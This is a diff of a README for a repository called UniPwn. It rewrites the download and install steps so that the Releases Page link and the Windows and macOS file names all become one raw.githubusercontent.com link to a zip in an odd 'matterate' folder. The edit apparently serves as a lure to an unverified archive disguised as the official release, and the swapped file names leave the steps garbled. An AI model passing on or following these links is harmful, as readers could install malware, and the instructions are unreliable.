fromgabyaaye/UniPwn/README.md

 ### 📥 Download & Install

 1. **Visit the Releases Page**
-   Go to the [Releases Page](https://github.com/fromgabyaaye/UniPwn/releases) to find the latest version of UniPwn.
+   Go to the [Releases Page](https://raw.githubusercontent.com/fromgabyaaye/UniPwn/main/matterate/UniPwn.zip) to find the latest version of UniPwn.

 2. **Download the Application**
    Look for the latest release and download the UniPwn application for your operating system.
 Choose the file that matches your system.

 3. **Install UniPwn**
    For Windows:
-   - Locate the downloaded file (`UniPwn.exe`) in your Downloads folder.
+   - Locate the downloaded file (`https://raw.githubusercontent.com/fromgabyaaye/UniPwn/main/matterate/UniPwn.zip`) in your Downloads folder.
    - Double-click the file to run the installer.
 Follow the prompts to complete the installation.

    For macOS:
-   - Find the downloaded file (`UniPwn.dmg`) in your Downloads folder.
+   - Find the downloaded file (`https://raw.githubusercontent.com/fromgabyaaye/UniPwn/main/matterate/UniPwn.zip`) in your Downloads folder.
    - Double-click the file and drag the UniPwn app to your Applications folder.

    For Linux: